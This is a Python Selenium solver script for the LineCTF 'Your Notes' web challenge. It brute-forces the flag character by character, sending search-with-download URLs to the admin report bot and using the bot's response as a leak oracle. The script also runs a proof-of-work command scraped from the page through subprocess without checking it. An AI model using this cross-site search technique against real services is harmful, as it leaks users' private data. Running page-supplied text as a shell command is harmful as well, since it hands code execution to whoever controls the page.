LineCTF Your Notes solver

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess

def random_string(length):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

options = webdriver.FirefoxOptions()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
# driver = webdriver.Remote("HUB_URL", options=options)
driver = webdriver.Firefox(options=options)

chall_url = "http://34.84.94.138"  # Change this

def create_account():
  username, password = random_string(10), random_string(10)
  print(f"Creating {username}:{password}")
  driver.get(chall_url + "/register")
  for i in range(2):
    WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.NAME, "username")))
    driver.find_element_by_name("username").send_keys(username)
    driver.find_element_by_name("password").send_keys(password)
    driver.find_element_by_xpath("//button[@type='submit']").click()

def new_note(title, content):
  driver.find_element_by_xpath("//a[contains(@href,'note')]").click()
  driver.find_element_by_name("title").send_keys(title)
  driver.find_element_by_name("content").send_keys(content)
  driver.find_element_by_xpath("//button[@type='submit']").click()
  WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.XPATH, "//h3[contains(@class,'title')]")))

def report(url):
  while True:
    print(f"Reporting {url}...")
    driver.get(chall_url + "/report")
    if "login" in driver.current_url:
      print("Relogging")
      create_account()
      continue
    try:
      WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.NAME, "url")))
    except:
      continue
    driver.find_element_by_name("url").send_keys(url)
    proof = driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[4]/p[2]/strong").text.split("\n")[1].split(" ")
    print(f"Calculating nonce... {proof}")
    proof = subprocess.check_output(proof).decode()
    print(f"Proof is {proof}")
    driver.find_element_by_name("proof").send_keys(proof)
    driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[3]/p/button").click()
    try:
      WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.XPATH, "/html/body/div/div/div/div[1]/form/div[5]")))
    except:
      continue
    if "Thank" in driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[5]").text:
      return False
    else:
      return True


create_account()

known = "LINECTF{1-kn0w-what-y0u-d0wn10ad}"
charset = "}" + "-" + string.ascii_lowercase + string.digits
index = 0

while known[-1] != "}":
  url = f"{chall_url}/search?q={known}{charset[index]}&download="
  print(f"Trying {known}{charset[index]} - {index}")

  if report(url):
    known += charset[index]
    print(f"Found {known}")

  if index == len(charset)-1:
    index = 0
  else:
    index +=1

driver.close()
driver.quit()